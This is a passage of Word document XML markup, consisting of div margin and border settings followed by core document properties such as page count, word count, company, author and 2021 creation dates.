            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="548300647">
          <w:marLeft w:val="1166"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="134"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="126972412">
          <w:marLeft w:val="1166"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="134"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="45884326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15</Pages>
  <Words>2233</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Red River College</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14938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workstation</dc:creator>
  <cp:lastModifiedBy>Stephen Jay</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <cp:lastPrinted>2018-03-16T14:20:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-19T19:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-23T03:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>